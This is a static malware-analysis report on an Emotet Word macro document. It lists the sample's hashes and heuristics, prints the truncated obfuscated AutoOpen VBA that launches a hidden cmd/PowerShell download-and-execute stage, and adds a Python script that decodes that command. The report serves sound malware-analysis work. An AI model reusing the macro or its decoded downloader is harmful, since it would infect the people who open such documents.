Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 23905e0bce997f33…

MALICIOUS

Office (OLE)

Size: 92.0 KB
Created: 2018-08-02 07:09:00
Authoring application: Microsoft Office Word
First seen: 2019-03-10
MD5: 09bc6da3b0e33169bf251b22356b37fa
SHA-1: 5decc7d39d83e13fe2fb7e0467b2a1b842a9f1de
SHA-256: 23905e0bce997f3359df37fae544069ea9134f4d05c8f857fd2d4d6f7aade4fb
Risk score: 142

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

ClamAV detects the sample as Emotet (Doc.Downloader.Emotet-6803955-0) and the VBA project contains an AutoOpen procedure, both typical of this family. AutoOpen calls Shell with a command built by concatenating the return values of helper functions; each helper assembles its piece from many short string literals, interleaved with junk AppActivate calls whose errors On Error Resume Next swallows. The recovered portion of the command reads cmd /V:O/C"set x28L=<78-character table>&&for %D in (<index list>..., the family's usual cmd-layer encoding: /V:O enables delayed expansion and each number in the list selects one character of the table (the largest index present is 77, matching the table length), so the loop rebuilds the real command, most likely a download-and-execute stage for the secondary payload. The window-style argument, 580251827 - 580251827, evaluates to 0 (vbHide). The legacy WordBasic auto-exec marker is the same AutoOpen name and adds no independent evidence.

Heuristics (5)

  • ClamAV: Doc.Downloader.Emotet-6803955-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6803955-0
  • VBA macros detected [medium, 1 related finding] OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The VBA project contains an AutoOpen procedure, which Word runs automatically when the document is opened with macros enabled; the extracted macros.bas shows it calling Shell.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker (AutoOpen). On its own this is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution. In this sample the marker is simply the AutoOpen procedure of the recovered VBA project, so it is not an independent finding.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main  In document text (OLE body)
    This is the DrawingML XML namespace URI, present in any document that carries DrawingML content; it is not an indicator on its own.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5654 bytes
SHA-256: d4c230babd4acd805a1aa4db0b2dd430e0cb869655d01d08ef6e5cba3c58bbf6
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "sDOZivbn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   AppActivate wBPlM
   AppActivate 2879
   AppActivate Hex(NoPWBD)
   AppActivate Sgn(GGVzB)
   AppActivate CSng(28893 + KzluMZ)
Shell@ CVar("cm") + OMbBwQUYnZAhjs + UctCBAcBmcE + NZwBAP + MVNYwp + KsMaLTjBlU + EWibjRcwwOk + WMjXjSfhh, 580251827 - 580251827
   AppActivate mKiIIo
   AppActivate ChrB(JGYhJa)
End Sub


Attribute VB_Name = "sBFWiOvbYOpsi"
Function NZwBAP()
On Error Resume Next
AppActivate 4652
   AppActivate CInt(pOnRI)
KJAzDljQ = "d /" + "V:O/C" + CStr(Chr(itdGiziA + ijjNAUZrCRBqkY + 34 + wGjwVIKSchcVB + DTIiZnnI)) + "s" + "et x28L=" + "jkHlL" + "JzFTWVO" + "Qz"
AppActivate Round(1)
   AppActivate 9
HUGjV = "hzXBmUhjjH" + "kR\5PvK@" + "n-9i" + "'0uy1" + ".}6" + "a" + ") " + "="
AppActivate 420444513
   AppActivate CBool(siuLLl - IwtUr + jiPVtd / 35839)
ctcPzGiAi = "sfw38/gN" + "x" + "Z(:qp+Gtdb" + "$r;DCeco,{" + "S"
AppActivate Tan(ZcsBo)
   AppActivate Sin(wbczY)
   AppActivate Hex(1)
SNEdEUIaXuj = "&&for %D " + "in (6" + "1,74," + "50,72," + "68,4" + "8,20,72,3," + "3,46,67,6"
AppActivate Chr(isOKf + 21139 - BMRAo / biVCVR)
   AppActivate CLng(97)
   AppActivate CBool(wOFwtv - 77527 + 53179 - vunlU)
GFrVfK = "6,22,6" + "0,47,32," + "72,50,3" + "3" + ",74" + ",66,22" + ",72" + ",73," + "64,46,55" + "," + "72,64,41" + ",9,7"
AppActivate WFXHi
   AppActivate Round(XIzUB)
ihtDrZlBAqw = "2,66,71,3," + "3" + "5,72," + "32,6" + "4,69,67,68" + ",17" + ",65,47" + ",36,20,6" + "4,64,61," + "59,53," + "53,2"
AppActivate 6
   AppActivate 4730
   AppActivate QRDju
dcBwWHi = "4,20,44,3" + "2,44,32,65" + ",18,38" + ",72,1" + "5,1" + "5,35," + "32,41,73," + "74" + ",18," + "53,25,"
AppActivate 946
   AppActivate CByte(UQRjwm)
nzZIM = "37,17,39" + ",35,11" + ",5" + "1" + ",66" + ",3"
AppActivate Int(LKJvw * McjwVj)
   AppActivate CByte(15)
pSVwKQ = "1,20,64" + ",64,61,5" + "9,53,53," + "61,4" + "4,68,35" + ",48," + "72,3,41" + "," + "6" + "1,3," + "5"
AppActivate CStr(23966 + hMnmHl)
   AppActivate ChrB(NVRlt)
tiBNbNpOsd = "3,5,7" + "4,1" + "1,56,19,7" + "7,5" + "7" + ",15,31,20," + "64,64"
NZwBAP = KJAzDljQ + HUGjV + ctcPzGiAi + SNEdEUIaXuj + GFrVfK + ihtDrZlBAqw + dcBwWHi + nzZIM + pSVwKQ + tiBNbNpOsd
   AppActivate ChrW(KGfwk)
   AppActivate CFHulw
   AppActivate 543
End Function
Function MVNYwp()
On Error Resume Next
AppActivate YMtdcl
   AppActivate Atn(2617)
oQUksbuj = ",61,59,53" + "," + "53,35,18" + ",7" + "2" + ",54,35,73" + ",44,41,73" + ",74,18,53," + "56,2" + "3,63,34,4" + "0,1" + "7,31,"
AppActivate CByte(143549204)
   AppActivate Tan(414)
VVociqMmj = "20,6" + "4,64" + ",61,59," + "53" + ",53,22,65," + "7" + "3,44,41,35" + ",32"
AppActivate Round(rHdiD)
   AppActivate CDbl(wTjSub)
ICTEz = ",53,73," + "38,52" + ",48," + "20,24" + ",50,3" + "1,20,64,64" + ",61," + "59,5" + "3,53,73,7" + "4,32,4" + "8,74" + ",68,73,"
AppActivate DomMT
   AppActivate icinM
   AppActivate aMARG
YAHFR = "35,74," + "48,48,72" + ",6" + "8,6" + "8,44" + ",54,44" + ",38,73," + "20,44,41,7" + "3,74," + "18,41,66" + ",68,53,43," + "43,64,19," + "10,36,41"
AppActivate 4069
   AppActivate Sqr(63420 * RzEdaj)
luibthqAY = ",77,61" + ",3,35,64,5" + "8,36,31," + "36,45,69" + ",6" + "7,22,19,3" + "8," + "46" + ",47,46," + "36,43,27"
AppActivate Cos(IuFaQs * vCSCtZ * CjiHO * IJOvoW)
   AppActivate Tan(jAdzp / fXzOW)
CGQkUKMiZWw = ",27," + "36,69,67" + ",18" + ",29,64," + "4" + "7,67," + "72,32" + "," + "29,59,64," + "72,18," + "61,62,3" + "6,26,36,6" + "2,67,22"
AppActivate 9160
   AppActivate wBiBr
   AppActivate wwbmk
HVNjKCMiA = ",1" + "9,38," + "62,36,41" + ",72," + "56,7" + "2" + ",36,69,4" + "9,74,68,72" + ",44,73" + ",20,5"
MVNYwp = oQUksbuj + VVociqMmj + ICTEz + YAHFR + luibthqAY + CGQkUKMiZWw + HVNjKCMiA
   AppActivate Round(57721 - EmECNE)
   Ap
... (truncated)
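As an added example, not part of this report or of the oletools output it quotes, the following Python script statically evaluates the two string-builder helpers that survive in the preview (NZwBAP and MVNYwp), reconstructs the Shell argument, and decodes the cmd-layer table. The function names (deobfuscate, decode_cmd_layer, eval_function and so on) are this example's own. It assumes only what is visible above: under On Error Resume Next an undeclared VBA name is Empty (0 in arithmetic, the empty string in concatenation), the AppActivate calls are junk, and the six helpers that the truncation cut off are reported as unresolved placeholders rather than guessed. The loop body after for %D in (...) is also past the cut; the decoder applies this family's usual one-character-per-index substring expansion, which the 78-character table and a largest index of 77 corroborate.

```python
import re

# Constructed input, not the report's tooling: a trimmed excerpt of the macros.bas preview above
# (the AutoOpen Shell call, the two string builders that survive the preview, one junk line).
SAMPLE_VBA = r"""
Sub AutoOpen()
On Error Resume Next
Shell@ CVar("cm") + OMbBwQUYnZAhjs + UctCBAcBmcE + NZwBAP + MVNYwp + KsMaLTjBlU + EWibjRcwwOk + WMjXjSfhh, 580251827 - 580251827
End Sub
Function NZwBAP()
AppActivate 4652
KJAzDljQ = "d /" + "V:O/C" + CStr(Chr(itdGiziA + ijjNAUZrCRBqkY + 34 + wGjwVIKSchcVB + DTIiZnnI)) + "s" + "et x28L=" + "jkHlL" + "JzFTWVO" + "Qz"
HUGjV = "hzXBmUhjjH" + "kR\5PvK@" + "n-9i" + "'0uy1" + ".}6" + "a" + ") " + "="
ctcPzGiAi = "sfw38/gN" + "x" + "Z(:qp+Gtdb" + "$r;DCeco,{" + "S"
SNEdEUIaXuj = "&&for %D " + "in (6" + "1,74," + "50,72," + "68,4" + "8,20,72,3," + "3,46,67,6"
GFrVfK = "6,22,6" + "0,47,32," + "72,50,3" + "3" + ",74" + ",66,22" + ",72" + ",73," + "64,46,55" + "," + "72,64,41" + ",9,7"
ihtDrZlBAqw = "2,66,71,3," + "3" + "5,72," + "32,6" + "4,69,67,68" + ",17" + ",65,47" + ",36,20,6" + "4,64,61," + "59,53," + "53,2"
dcBwWHi = "4,20,44,3" + "2,44,32,65" + ",18,38" + ",72,1" + "5,1" + "5,35," + "32,41,73," + "74" + ",18," + "53,25,"
nzZIM = "37,17,39" + ",35,11" + ",5" + "1" + ",66" + ",3"
pSVwKQ = "1,20,64" + ",64,61,5" + "9,53,53," + "61,4" + "4,68,35" + ",48," + "72,3,41" + "," + "6" + "1,3," + "5"
tiBNbNpOsd = "3,5,7" + "4,1" + "1,56,19,7" + "7,5" + "7" + ",15,31,20," + "64,64"
NZwBAP = KJAzDljQ + HUGjV + ctcPzGiAi + SNEdEUIaXuj + GFrVfK + ihtDrZlBAqw + dcBwWHi + nzZIM + pSVwKQ + tiBNbNpOsd
End Function
Function MVNYwp()
oQUksbuj = ",61,59,53" + "," + "53,35,18" + ",7" + "2" + ",54,35,73" + ",44,41,73" + ",74,18,53," + "56,2" + "3,63,34,4" + "0,1" + "7,31,"
VVociqMmj = "20,6" + "4,64" + ",61,59," + "53" + ",53,22,65," + "7" + "3,44,41,35" + ",32"
ICTEz = ",53,73," + "38,52" + ",48," + "20,24" + ",50,3" + "1,20,64,64" + ",61," + "59,5" + "3,53,73,7" + "4,32,4" + "8,74" + ",68,73,"
YAHFR = "35,74," + "48,48,72" + ",6" + "8,6" + "8,44" + ",54,44" + ",38,73," + "20,44,41,7" + "3,74," + "18,41,66" + ",68,53,43," + "43,64,19," + "10,36,41"
luibthqAY = ",77,61" + ",3,35,64,5" + "8,36,31," + "36,45,69" + ",6" + "7,22,19,3" + "8," + "46" + ",47,46," + "36,43,27"
CGQkUKMiZWw = ",27," + "36,69,67" + ",18" + ",29,64," + "4" + "7,67," + "72,32" + "," + "29,59,64," + "72,18," + "61,62,3" + "6,26,36,6" + "2,67,22"
HVNjKCMiA = ",1" + "9,38," + "62,36,41" + ",72," + "56,7" + "2" + ",36,69,4" + "9,74,68,72" + ",44,73" + ",20,5"
MVNYwp = oQUksbuj + VVociqMmj + ICTEz + YAHFR + luibthqAY + CGQkUKMiZWw + HVNjKCMiA
End Function
"""

FUNC_RE = re.compile(r"^(?:Function|Sub)\s+(\w+)\(\)(.*?)^End (?:Function|Sub)", re.M | re.S)
ASSIGN_RE = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$")
# cmd layer: set <var>=<table>&&for %<i> in (<indices>...  (the list may be cut short)
CMD_RE = re.compile(r"set (\w+)=(.*?)&&for %(\w) in \(([\d,\s]*)")

def eval_arith(expr):
    # +/- over integers and names; an undeclared name is Empty (0), so Chr(a + 34 + b) is Chr(34)
    total, sign = 0, 1
    for tok in re.findall(r"[+-]|\d+|[A-Za-z_]\w*", expr):
        if tok in ("+", "-"):
            sign = 1 if tok == "+" else -1
        else:
            total, sign = total + sign * (int(tok) if tok.isdigit() else 0), 1
    return total

def split_plus(expr):
    # split on '+' outside string literals and parentheses ("Z(:qp+Gtdb" must stay whole)
    terms, cur, depth, in_str = [], "", 0, False
    for ch in expr:
        in_str ^= ch == '"'
        if not in_str and ch in "()":
            depth += 1 if ch == "(" else -1
        if not in_str and ch == "+" and depth == 0:
            terms.append(cur.strip()); cur = ""
        else:
            cur += ch
    return terms + [cur.strip()]

def eval_term(term, env, unresolved):
    if m := re.fullmatch(r'"([^"]*)"', term):
        return m.group(1)
    if m := re.fullmatch(r"(?:CVar|CStr)\((.*)\)", term):  # casts are identity for strings
        return eval_term(m.group(1), env, unresolved)
    if m := re.fullmatch(r"Chr\((.*)\)", term):
        return chr(eval_arith(m.group(1)))
    if term in env:
        return env[term]
    unresolved.append(term)  # no body in the excerpt: keep a visible placeholder, never guess
    return "{" + term + "}"

def eval_expr(expr, env, unresolved):
    return "".join(eval_term(t, env, unresolved) for t in split_plus(expr))

def eval_function(name, body):
    # run the helper's assignments in order; junk lines (AppActivate ...) have no '=' and drop out
    local = {}
    for line in body.splitlines():
        if m := ASSIGN_RE.match(line):
            local[m.group(1)] = eval_expr(m.group(2), local, [])
    return local.get(name, "")  # a helper that never assigns its own name returns Empty

def deobfuscate(vba_src):
    funcs = dict(FUNC_RE.findall(vba_src))
    env = {n: eval_function(n, b) for n, b in funcs.items() if n != "AutoOpen"}
    shell = next(l for l in funcs["AutoOpen"].splitlines() if l.lstrip().startswith("Shell"))
    expr, _, style = shell.split(None, 1)[1].rpartition(",")  # "Shell@ <expr>, <window style>"
    unresolved = []
    return {"command": eval_expr(expr, env, unresolved),
            "window_style": eval_arith(style), "unresolved": unresolved}

def decode_cmd_layer(command):
    # /V:O enables delayed expansion; each index picks one table character (the loop body,
    # past the truncation point, is this family's !x28L:~%D,1! substring expansion)
    if not (m := CMD_RE.search(command)):
        return None
    table, idx = m.group(2), [int(n) for n in re.findall(r"\d+", m.group(4))]
    return table, idx, "".join(table[i] if i < len(table) else "?" for i in idx)

if __name__ == "__main__":
    res = deobfuscate(SAMPLE_VBA)
    print(res["window_style"], res["unresolved"], decode_cmd_layer(res["command"])[2])
```

Run as a script it prints the window style (0, vbHide), the five unresolved helper names, and the decoded inner command, which on the page's own strings begins powershell $bjq=new-object Net.WebClient;$rBd='http:// followed by @-separated URLs; the table is 78 characters long and the largest index is 77, which corroborates the one-character-per-index expansion. Because the index list continues in the helpers that were cut off, treat the decoded tail and any URL it contains as incomplete until the full macros.bas has been decoded.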